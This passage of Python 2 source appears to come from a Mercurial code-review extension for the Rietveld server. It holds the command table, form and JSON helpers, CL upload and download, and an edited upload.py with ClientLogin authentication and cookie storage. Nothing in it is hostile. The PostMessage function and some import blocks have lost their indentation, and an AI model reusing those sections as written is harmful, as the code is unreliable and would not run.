			# Empty CLs are only reported, never deleted automatically.
			if not cl.copied_from:
				ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
			else:
				ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
	return
def upload(ui, repo, name, **opts):
	"""upload diffs to the code review server

	Uploads the current modifications for a given change to the server.
	"""
	if missing_codereview:
		return missing_codereview

	# Suppress Mercurial's own chatter; we print the CL URL ourselves.
	repo.ui.quiet = True
	cl, err = LoadCL(ui, repo, name, web=True)
	if err != "":
		return err
	if not cl.local:
		return "cannot upload non-local change"
	cl.Upload(ui, repo)
	# Echo the CL's URL so the user can open it in a browser.
	print "%s%s\n" % (server_url_base, cl.name)
	return
# Command-line options shared by the commands that send a CL out for
# review (mail and submit).  Each tuple is a Mercurial option spec:
# (short flag, long flag, default, help text).
review_opts = [
	('r', 'reviewer', '', 'add reviewer'),
	('', 'cc', '', 'add cc'),
	('', 'tbr', '', 'add future reviewer'),
	('m', 'message', '', 'change description (for new change)'),
]
# Mercurial command table: maps command name to a tuple of
# (implementation function, option table, usage synopsis).
cmdtable = {
	# The ^ means to show this command in the help text that
	# is printed when running hg with no arguments.
	"^change": (
		change,
		[
			('d', 'delete', None, 'delete existing change list'),
			('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
			('i', 'stdin', None, 'read change list from standard input'),
			('o', 'stdout', None, 'print change list to standard output'),
			('p', 'pending', None, 'print pending summary to standard output'),
		],
		"[-d | -D] [-i] [-o] change# or FILE ..."
	),
	"^clpatch": (
		clpatch,
		[
			('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# Would prefer to call this codereview-login, but then
	# hg help codereview prints the help for this command
	# instead of the help for the extension.
	"code-login": (
		code_login,
		[],
		"",
	),
	"^download": (
		download,
		[],
		"change#"
	),
	"^file": (
		file,
		[
			('d', 'delete', None, 'delete files from change list (but not repository)'),
		],
		"[-d] change# FILE ..."
	),
	"^gofmt": (
		gofmt,
		[
			('l', 'list', None, 'list files that would change, but do not edit them'),
		],
		"FILE ..."
	),
	"^pending|p": (
		pending,
		[],
		"[FILE ...]"
	),
	"^mail": (
		mail,
		review_opts + [
		] + commands.walkopts,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^release-apply": (
		release_apply,
		[
			('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# TODO: release-start, release-tag, weekly-tag
	"^submit": (
		submit,
		review_opts + [
			('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
			('n', 'dryrun', None, 'make change only locally (for testing)'),
		] + commands.walkopts + commands.commitopts + commands.commitopts2,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^sync": (
		sync,
		[
			('', 'local', None, 'do not pull changes from remote repository')
		],
		"[--local]",
	),
	"^undo": (
		undo,
		[
			('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	"^upload": (
		upload,
		[],
		"change#"
	),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
# HTML form parser
class FormParser(HTMLParser):
	"""Collects an HTML form's fields into self.map.

	After feeding a page, self.map maps each <input> name to its value
	attribute and each <textarea> name to its body text (with character
	and entity references decoded).
	"""
	def __init__(self):
		self.map = {}       # field name -> field value
		self.curtag = None  # name of the <textarea> currently open, if any
		self.curdata = None # accumulated body of that textarea
		HTMLParser.__init__(self)
	def handle_starttag(self, tag, attrs):
		if tag == "input":
			key = None
			value = ''
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
				if a[0] == 'value':
					value = a[1]
			if key is not None:
				self.map[key] = value
		if tag == "textarea":
			key = None
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
			if key is not None:
				self.curtag = key
				self.curdata = ''
	def handle_endtag(self, tag):
		if tag == "textarea" and self.curtag is not None:
			self.map[self.curtag] = self.curdata
			self.curtag = None
			self.curdata = None
	def handle_charref(self, name):
		# Character references may be decimal ("&#65;" -> name "65") or
		# hexadecimal ("&#x41;" -> name "x41"); handle both forms rather
		# than crashing with ValueError on hex input.
		if name.startswith(('x', 'X')):
			self.handle_data(unichr(int(name[1:], 16)))
		else:
			self.handle_data(unichr(int(name)))
	def handle_entityref(self, name):
		import htmlentitydefs
		if name in htmlentitydefs.entitydefs:
			self.handle_data(htmlentitydefs.entitydefs[name])
		else:
			# Unknown entity: pass it through verbatim.
			self.handle_data("&" + name + ";")
	def handle_data(self, data):
		# Only accumulate text while inside a <textarea>.
		if self.curdata is not None:
			self.curdata += data
def JSONGet(ui, path):
	"""Fetch path from the code review server and return the parsed,
	fix_json-normalized JSON value, or None on any failure.

	Best effort: every error (network, auth, malformed JSON) is
	reported via ui.warn and mapped to None.
	"""
	try:
		raw = MySend(path, force_auth=False)
		typecheck(raw, str)
		return fix_json(json.loads(raw))
	except:
		ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
		return None
# Normalize json parser output to match our expectations:
#   * all strings are UTF-8-encoded str, not unicode;
#   * None-valued dict entries are removed entirely, so that
#     d.get("foo", defaultvalue) works;
#   * CRLF line endings become plain LF.
def fix_json(x):
	kind = type(x)
	if kind in [str, int, float, bool, type(None)]:
		pass
	elif kind is unicode:
		x = x.encode("utf-8")
	elif kind is list:
		# Fix elements in place.
		for i, elem in enumerate(x):
			x[i] = fix_json(elem)
	elif kind is dict:
		# Fix values in place, then drop the None-valued keys.
		dead = [k for k in x if x[k] is None]
		for k in x:
			if x[k] is not None:
				x[k] = fix_json(x[k])
		for k in dead:
			del x[k]
	else:
		raise util.Abort("unknown type " + str(kind) + " in fix_json")
	if type(x) is str:
		x = x.replace('\r\n', '\n')
	return x
def IsRietveldSubmitted(ui, clname, hex):
	"""Report whether Rietveld records CL clname as submitted as the
	commit whose hash starts with the digits captured from the
	"*** Submitted as ... ***" message."""
	# Renamed the result variable: the original shadowed the builtin 'dict'.
	issue = JSONGet(ui, "/api/" + clname + "?messages=true")
	if issue is None:
		return False
	for msg in issue.get("messages", []):
		text = msg.get("text", "")
		m = re.match(r'\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
		# Require at least 8 hex digits so a short accidental match
		# cannot claim an unrelated commit.
		if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
			return True
	return False
def IsRietveldMailed(cl):
	# A CL counts as mailed once any message on the Rietveld issue
	# contains the standard review-request boilerplate.
	needle = "I'd like you to review this change"
	for msg in cl.dict.get("messages", []):
		if needle in msg.get("text", ""):
			return True
	return False
def DownloadCL(ui, repo, clname):
	"""Fetch CL metadata and its most recent diff from Rietveld.

	Returns (cl, vers, diffdata, err): the CL object, the repo version
	the diff was made against (if recorded), the raw diff text, and an
	error string ("" on success).  On failure the first three are None.
	"""
	set_status("downloading CL " + clname)
	cl, err = LoadCL(ui, repo, clname, web=True)
	if err != "":
		return None, None, None, "error loading CL %s: %s" % (clname, err)

	# Find most recent diff
	diffs = cl.dict.get("patchsets", [])
	if not diffs:
		return None, None, None, "CL has no patch sets"
	patchid = diffs[-1]

	patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
	if patchset is None:
		return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
	if patchset.get("patchset", 0) != patchid:
		return None, None, None, "malformed patchset information"

	# The patchset message looks like "diff -r <vers> ..." when the
	# uploader recorded which revision the diff is against.
	vers = ""
	msg = patchset.get("message", "").split()
	if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
		vers = msg[2]
	diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
	diffdata = MySend(diff, force_auth=False)

	# Decide whether this CL is our own or copied from someone else,
	# based on the owner email recorded on the issue.
	email = cl.dict.get("owner_email", "")
	if not email:
		return None, None, None, "cannot find owner for %s" % (clname)
	him = FindContributor(ui, repo, email)
	me = FindContributor(ui, repo, None)
	if him == me:
		cl.mailed = IsRietveldMailed(cl)
	else:
		cl.copied_from = email

	return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Run MySend1 maybe twice, because Rietveld is unreliable."""
	try:
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
	except Exception, e:
		# Retry exactly once, and only for a server-side HTTP 500.
		if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
			raise
		print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
		time.sleep(2)
		return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
		content_type="application/octet-stream",
		timeout=None, force_auth=True,
		**kwargs):
	"""Sends an RPC and returns the response.

	Args:
		request_path: The path to send the request to, eg /api/appversion/create.
		payload: The body of the request, or None to send an empty request.
		content_type: The Content-Type header to use.
		timeout: timeout in seconds; default None i.e. no timeout.
			(Note: for large requests on OS X, the timeout doesn't work right.)
		kwargs: Any keyword arguments are converted into query string parameters.

	Returns:
		The response body, as a string.
	"""
	# TODO: Don't require authentication.  Let the server say
	# whether it is necessary.
	global rpc
	# Lazily create the shared RPC server on first use.
	if rpc == None:
		rpc = GetRpcServer(upload_options)
	# 'self' aliases the module-level rpc object so the body below can
	# read like the AbstractRpcServer.Send method it was adapted from.
	self = rpc
	if not self.authenticated and force_auth:
		self._Authenticate()
	if request_path is None:
		return

	old_timeout = socket.getdefaulttimeout()
	socket.setdefaulttimeout(timeout)
	try:
		tries = 0
		while True:
			tries += 1
			args = dict(kwargs)
			url = "http://%s%s" % (self.host, request_path)
			if args:
				url += "?" + urllib.urlencode(args)
			req = self._CreateRequest(url=url, data=payload)
			req.add_header("Content-Type", content_type)
			try:
				f = self.opener.open(req)
				response = f.read()
				f.close()
				# Translate \r\n into \n, because Rietveld doesn't.
				response = response.replace('\r\n', '\n')
				# who knows what urllib will give us
				if type(response) == unicode:
					response = response.encode("utf-8")
				typecheck(response, str)
				return response
			except urllib2.HTTPError, e:
				# Give up after three failed attempts.
				if tries > 3:
					raise
				elif e.code == 401:
					self._Authenticate()
				elif e.code == 302:
					# Only re-authenticate when redirected to the
					# Google accounts login page; any other redirect
					# is treated as an empty response.
					loc = e.info()["location"]
					if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
						return ''
					self._Authenticate()
				else:
					raise
	finally:
		# Restore the process-wide socket timeout whatever happens.
		socket.setdefaulttimeout(old_timeout)
def GetForm(url):
	"""Fetch url and return its HTML form fields as a dict mapping
	UTF-8 field name to UTF-8, LF-normalized field value."""
	parser = FormParser()
	parser.feed(ustr(MySend(url)))  # FormParser.feed wants unicode
	parser.close()
	# Convert back to utf-8 to restore sanity.
	fields = {}
	for name, value in parser.map.items():
		fields[name.encode("utf-8")] = value.replace("\r\n", "\n").encode("utf-8")
	return fields
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
	"""Update metadata on a Rietveld issue via its /edit form.

	Only the arguments that are not None (or, for the flags, True)
	change the corresponding field; everything else is left as the
	server returned it.
	"""
	set_status("uploading change to description")
	form_fields = GetForm("/" + issue + "/edit")
	for field, value in [
			('subject', subject),
			('description', desc),
			('reviewers', reviewers),
			('cc', cc)]:
		if value is not None:
			form_fields[field] = value
	if closed:
		form_fields['closed'] = "checked"
	if private:
		form_fields['private'] = "checked"
	ctype, body = EncodeMultipartFormData(form_fields.items(), [])
	response = MySend("/" + issue + "/edit", body, content_type=ctype)
	# The server replies with an empty body on success.
	if response != "":
		print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
		sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
	# Bare attribute container: RietveldSetup instantiates it as
	# upload_options and assigns fields one by one, standing in for
	# the optparse options object that the upload.py code expects.
	pass
def nocommit(*pats, **opts):
	"""(disabled when using this extension)"""
	# Installed over cmdutil.commit by RietveldSetup so a plain
	# 'hg commit' cannot bypass the code review workflow.
	raise util.Abort("codereview extension enabled; use mail, upload, or submit instead of commit")
def nobackout(*pats, **opts):
	"""(disabled when using this extension)"""
	# Defined for symmetry with nocommit/norollback; RietveldSetup
	# notes it cannot actually install this one over hg backout.
	raise util.Abort("codereview extension enabled; use undo instead of backout")
def norollback(*pats, **opts):
	"""(disabled when using this extension)"""
	# Installed over repo.rollback by RietveldSetup; the original
	# rollback is preserved in real_rollback for submit's error path.
	raise util.Abort("codereview extension enabled; use undo instead of rollback")
def RietveldSetup(ui, repo):
	"""One-time per-repository initialization of the extension:
	reads codereview.cfg and the CONTRIBUTORS file, disables the
	Mercurial commands that would bypass review, and builds the
	upload.py options object and release-branch state."""
	global defaultcc, upload_options, rpc, server, server_url_base, force_google_account, verbosity, contributors
	global missing_codereview

	repo_config_path = ''
	# Read repository-specific options from lib/codereview/codereview.cfg
	try:
		repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
		f = open(repo_config_path)
		for line in f:
			if line.startswith('defaultcc: '):
				# NOTE(review): line[10:] starts at the space after the
				# colon ('defaultcc: ' is 11 chars); presumably
				# SplitCommaSpace tolerates the leading blank — verify.
				defaultcc = SplitCommaSpace(line[10:])
	except:
		# If there are no options, chances are good this is not
		# a code review repository; stop now before we foul
		# things up even worse. Might also be that repo doesn't
		# even have a root. See issue 959.
		if repo_config_path == '':
			missing_codereview = 'codereview disabled: repository has no root'
		else:
			missing_codereview = 'codereview disabled: cannot open ' + repo_config_path
		return

	# Should only modify repository with hg submit.
	# Disable the built-in Mercurial commands that might
	# trip things up.
	cmdutil.commit = nocommit
	global real_rollback
	real_rollback = repo.rollback
	repo.rollback = norollback
	# would install nobackout if we could; oh well

	try:
		f = open(repo.root + '/CONTRIBUTORS', 'r')
	except:
		raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
	for line in f:
		# CONTRIBUTORS is a list of lines like:
		#	Person <email>
		#	Person <email> <alt-email>
		# The first email address is the one used in commit logs.
		if line.startswith('#'):
			continue
		m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
		if m:
			name = m.group(1)
			email = m.group(2)[1:-1]
			contributors[email.lower()] = (name, email)
			# Alternate addresses map to the same (name, primary email).
			for extra in m.group(3).split():
				contributors[extra[1:-1].lower()] = (name, email)

	if not ui.verbose:
		verbosity = 0

	# Config options.
	x = ui.config("codereview", "server")
	if x is not None:
		server = x

	# TODO(rsc): Take from ui.username?
	email = None
	x = ui.config("codereview", "email")
	if x is not None:
		email = x

	server_url_base = "http://" + server + "/"

	testing = ui.config("codereview", "testing")
	force_google_account = ui.configbool("codereview", "force_google_account", False)

	# Build the fake optparse options object consumed by the
	# embedded upload.py code (see class opt).
	upload_options = opt()
	upload_options.email = email
	upload_options.host = None
	upload_options.verbose = 0
	upload_options.description = None
	upload_options.description_file = None
	upload_options.reviewers = None
	upload_options.cc = None
	upload_options.message = None
	upload_options.issue = None
	upload_options.download_base = False
	upload_options.revision = None
	upload_options.send_mail = False
	upload_options.vcs = None
	upload_options.server = server
	upload_options.save_cookies = True

	if testing:
		upload_options.save_cookies = False
		upload_options.email = "test@example.com"

	rpc = None

	global releaseBranch
	tags = repo.branchtags().keys()
	if 'release-branch.r100' in tags:
		# NOTE(rsc): This tags.sort is going to get the wrong
		# answer when comparing release-branch.r99 with
		# release-branch.r100. If we do ten releases a year
		# that gives us 4 years before we have to worry about this.
		raise util.Abort('tags.sort needs to be fixed for release-branch.r100')
	tags.sort()
	# Remember the lexically largest release branch.
	for t in tags:
		if t.startswith('release-branch.'):
			releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity (consumed by StatusUpdate below):
#  0: Errors only.
#  1: Status messages.
#  2: Info logs.
#  3: Debug logs.
verbosity = 1

# Max size of patch or base file, in bytes (900 KiB).
MAX_UPLOAD_SIZE = 900 * 1024

# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
	'application/javascript',
	'application/x-javascript',
	'application/x-freemind'
]
def GetEmail(prompt):
	"""Prompts the user for their email address and returns it.

	The last used email address is saved to a file and offered up as a suggestion
	to the user. If the user presses enter without typing in anything the last
	used email address is used. If the user enters a new address, it is saved
	for next time we prompt.
	"""
	last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
	last_email = ""
	if os.path.exists(last_email_file_name):
		try:
			last_email_file = open(last_email_file_name, "r")
			last_email = last_email_file.readline().strip("\n")
			last_email_file.close()
			prompt += " [%s]" % last_email
		except IOError, e:
			# Unreadable cache file: just prompt without a suggestion.
			pass
	email = raw_input(prompt + ": ").strip()
	if email:
		# Remember the newly entered address for next time; failure
		# to save it is non-fatal.
		try:
			last_email_file = open(last_email_file_name, "w")
			last_email_file.write(email)
			last_email_file.close()
		except IOError, e:
			pass
	else:
		# Empty input means "reuse the previous address".
		email = last_email
	return email
def StatusUpdate(msg):
	"""Print a status message to stdout.

	If 'verbosity' is greater than 0, print the message.

	Args:
		msg: The string to print.
	"""
	if verbosity > 0:
		print msg
def ErrorExit(msg):
	"""Print an error message to stderr and exit (status 1)."""
	print >>sys.stderr, msg
	sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
	"""Raised to indicate there was an error authenticating with ClientLogin."""
	def __init__(self, url, code, msg, headers, args):
		urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
		self.args = args
		# ClientLogin reports the failure kind (e.g. "BadAuthentication",
		# "CaptchaRequired") under the "Error" key; _Authenticate
		# branches on this value.
		self.reason = args["Error"]
class AbstractRpcServer(object):
	"""Provides a common interface for a simple RPC server."""

	def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
		"""Creates a new HttpRpcServer.

		Args:
			host: The host to send requests to.
			auth_function: A function that takes no arguments and returns an
				(email, password) tuple when called. Will be called if authentication
				is required.
			host_override: The host header to send to the server (defaults to host).
			extra_headers: A dict of extra headers to append to every request.
			save_cookies: If True, save the authentication cookies to local disk.
				If False, use an in-memory cookiejar instead. Subclasses must
				implement this functionality. Defaults to False.
		"""
		# NOTE(review): extra_headers={} is a shared mutable default; it is
		# only stored and iterated here, so this is safe as long as no
		# caller mutates the default instance.
		self.host = host
		self.host_override = host_override
		self.auth_function = auth_function
		self.authenticated = False
		self.extra_headers = extra_headers
		self.save_cookies = save_cookies
		self.opener = self._GetOpener()
		if self.host_override:
			logging.info("Server: %s; Host: %s", self.host, self.host_override)
		else:
			logging.info("Server: %s", self.host)

	def _GetOpener(self):
		"""Returns an OpenerDirector for making HTTP requests.

		Returns:
			A urllib2.OpenerDirector object.
		"""
		raise NotImplementedError()

	def _CreateRequest(self, url, data=None):
		"""Creates a new urllib request."""
		logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
		req = urllib2.Request(url, data=data)
		if self.host_override:
			req.add_header("Host", self.host_override)
		for key, value in self.extra_headers.iteritems():
			req.add_header(key, value)
		return req

	def _GetAuthToken(self, email, password):
		"""Uses ClientLogin to authenticate the user, returning an auth token.

		Args:
			email: The user's email address
			password: The user's password

		Raises:
			ClientLoginError: If there was an error authenticating with ClientLogin.
			HTTPError: If there was some other form of HTTP error.

		Returns:
			The authentication token returned by ClientLogin.
		"""
		account_type = "GOOGLE"
		if self.host.endswith(".google.com") and not force_google_account:
			# Needed for use inside Google.
			account_type = "HOSTED"
		req = self._CreateRequest(
			url="https://www.google.com/accounts/ClientLogin",
			data=urllib.urlencode({
				"Email": email,
				"Passwd": password,
				"service": "ah",
				"source": "rietveld-codereview-upload",
				"accountType": account_type,
			}),
		)
		try:
			response = self.opener.open(req)
			response_body = response.read()
			# ClientLogin replies with "Key=Value" lines; the token is
			# under "Auth".
			# NOTE(review): this split("=") has no maxsplit, unlike the
			# error path below which uses split("=", 1); a value
			# containing '=' would make dict() fail here — verify.
			response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
			return response_dict["Auth"]
		except urllib2.HTTPError, e:
			if e.code == 403:
				body = e.read()
				response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
				raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
			else:
				raise

	def _GetAuthCookie(self, auth_token):
		"""Fetches authentication cookies for an authentication token.

		Args:
			auth_token: The authentication token returned by ClientLogin.

		Raises:
			HTTPError: If there was an error fetching the authentication cookies.
		"""
		# This is a dummy value to allow us to identify when we're successful.
		continue_location = "http://localhost/"
		args = {"continue": continue_location, "auth": auth_token}
		req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
		try:
			response = self.opener.open(req)
		except urllib2.HTTPError, e:
			# The expected result is a redirect (302), which urllib2
			# surfaces as an HTTPError; treat it as the response.
			response = e
		if (response.code != 302 or
				response.info()["location"] != continue_location):
			raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
		self.authenticated = True

	def _Authenticate(self):
		"""Authenticates the user.

		The authentication process works as follows:
		1) We get a username and password from the user
		2) We use ClientLogin to obtain an AUTH token for the user
			(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
		3) We pass the auth token to /_ah/login on the server to obtain an
			authentication cookie. If login was successful, it tries to redirect
			us to the URL we provided.

		If we attempt to access the upload API without first obtaining an
		authentication cookie, it returns a 401 response (or a 302) and
		directs us to authenticate ourselves with ClientLogin.
		"""
		# Allow up to three attempts at entering a valid password;
		# any other ClientLogin failure is final.
		for i in range(3):
			credentials = self.auth_function()
			try:
				auth_token = self._GetAuthToken(credentials[0], credentials[1])
			except ClientLoginError, e:
				if e.reason == "BadAuthentication":
					print >>sys.stderr, "Invalid username or password."
					continue
				if e.reason == "CaptchaRequired":
					print >>sys.stderr, (
						"Please go to\n"
						"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
						"and verify you are a human. Then try again.")
					break
				if e.reason == "NotVerified":
					print >>sys.stderr, "Account not verified."
					break
				if e.reason == "TermsNotAgreed":
					print >>sys.stderr, "User has not agreed to TOS."
					break
				if e.reason == "AccountDeleted":
					print >>sys.stderr, "The user account has been deleted."
					break
				if e.reason == "AccountDisabled":
					print >>sys.stderr, "The user account has been disabled."
					break
				if e.reason == "ServiceDisabled":
					print >>sys.stderr, "The user's access to the service has been disabled."
					break
				if e.reason == "ServiceUnavailable":
					print >>sys.stderr, "The service is not available; try again later."
					break
				# Unknown failure reason: propagate.
				raise
			self._GetAuthCookie(auth_token)
			return

	def Send(self, request_path, payload=None,
			content_type="application/octet-stream",
			timeout=None,
			**kwargs):
		"""Sends an RPC and returns the response.

		Args:
			request_path: The path to send the request to, eg /api/appversion/create.
			payload: The body of the request, or None to send an empty request.
			content_type: The Content-Type header to use.
			timeout: timeout in seconds; default None i.e. no timeout.
				(Note: for large requests on OS X, the timeout doesn't work right.)
			kwargs: Any keyword arguments are converted into query string parameters.

		Returns:
			The response body, as a string.
		"""
		# TODO: Don't require authentication.  Let the server say
		# whether it is necessary.
		if not self.authenticated:
			self._Authenticate()

		old_timeout = socket.getdefaulttimeout()
		socket.setdefaulttimeout(timeout)
		try:
			tries = 0
			while True:
				tries += 1
				args = dict(kwargs)
				url = "http://%s%s" % (self.host, request_path)
				if args:
					url += "?" + urllib.urlencode(args)
				req = self._CreateRequest(url=url, data=payload)
				req.add_header("Content-Type", content_type)
				try:
					f = self.opener.open(req)
					response = f.read()
					f.close()
					return response
				except urllib2.HTTPError, e:
					# Give up after three failed attempts; re-authenticate
					# on 401/302 and retry, propagate anything else.
					if tries > 3:
						raise
					elif e.code == 401 or e.code == 302:
						self._Authenticate()
					else:
						raise
		finally:
			# Restore the process-wide socket timeout whatever happens.
			socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
	"""Provides a simplified RPC-style interface for HTTP requests."""

	def _Authenticate(self):
		"""Save the cookie jar after authentication."""
		super(HttpRpcServer, self)._Authenticate()
		if self.save_cookies:
			StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
			self.cookie_jar.save()

	def _GetOpener(self):
		"""Returns an OpenerDirector that supports cookies and ignores redirects.

		Returns:
			A urllib2.OpenerDirector object.
		"""
		opener = urllib2.OpenerDirector()
		opener.add_handler(urllib2.ProxyHandler())
		opener.add_handler(urllib2.UnknownHandler())
		opener.add_handler(urllib2.HTTPHandler())
		opener.add_handler(urllib2.HTTPDefaultErrorHandler())
		opener.add_handler(urllib2.HTTPSHandler())
		opener.add_handler(urllib2.HTTPErrorProcessor())
		if self.save_cookies:
			# Cookie file is per-server; module-level 'server' is set
			# by RietveldSetup.
			self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
			self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
			if os.path.exists(self.cookie_file):
				try:
					self.cookie_jar.load()
					self.authenticated = True
					StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
				except (cookielib.LoadError, IOError):
					# Failed to load cookies - just ignore them.
					pass
			else:
				# Create an empty cookie file with mode 600
				fd = os.open(self.cookie_file, os.O_CREAT, 0600)
				os.close(fd)
			# Always chmod the cookie file: it holds credentials.
			os.chmod(self.cookie_file, 0600)
		else:
			# Don't save cookies across runs of update.py.
			self.cookie_jar = cookielib.CookieJar()
		opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
		return opener
def GetRpcServer(options):
	"""Returns an instance of an AbstractRpcServer.

	Returns:
		A new AbstractRpcServer, on which RPC calls can be made.
	"""
	rpc_server_class = HttpRpcServer

	def GetUserCredentials():
		"""Prompts the user for a username and password."""
		# Disable status prints so they don't obscure the password prompt.
		global global_status
		st = global_status
		global_status = None

		email = options.email
		if email is None:
			email = GetEmail("Email (login for uploading to %s)" % options.server)
		password = getpass.getpass("Password for %s: " % email)

		# Put status back.
		global_status = st
		return (email, password)

	# If this is the dev_appserver, use fake authentication.
	host = (options.host or options.server).lower()
	if host == "localhost" or host.startswith("localhost:"):
		email = options.email
		if email is None:
			email = "test@example.com"
		logging.info("Using debug user %s. Override with --email" % email)
		server = rpc_server_class(
			options.server,
			lambda: (email, "password"),
			host_override=options.host,
			extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
			save_cookies=options.save_cookies)
		# Don't try to talk to ClientLogin.
		server.authenticated = True
		return server

	return rpc_server_class(options.server, GetUserCredentials,
		host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
	"""Encode form fields for multipart/form-data.

	Args:
		fields: A sequence of (name, value) elements for regular form fields.
		files: A sequence of (name, filename, value) elements for data to be
			uploaded as files.
	Returns:
		(content_type, body) ready for httplib.HTTP instance.
	Source:
		http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
	"""
	BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
	CRLF = '\r\n'
	parts = []
	for (name, value) in fields:
		typecheck(name, str)
		typecheck(value, str)
		parts.extend([
			'--' + BOUNDARY,
			'Content-Disposition: form-data; name="%s"' % name,
			'',
			value,
		])
	for (name, filename, value) in files:
		typecheck(name, str)
		typecheck(filename, str)
		typecheck(value, str)
		parts.extend([
			'--' + BOUNDARY,
			'Content-Disposition: form-data; name="%s"; filename="%s"' % (name, filename),
			'Content-Type: %s' % GetContentType(filename),
			'',
			value,
		])
	# Closing boundary, then a trailing CRLF.
	parts.append('--' + BOUNDARY + '--')
	parts.append('')
	body = CRLF.join(parts)
	content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
	return content_type, body
def GetContentType(filename):
	"""Helper to guess the content-type from the filename."""
	guessed, _ = mimetypes.guess_type(filename)
	if not guessed:
		return 'application/octet-stream'
	return guessed
# Use a shell for subcommands on Windows to get a PATH search.
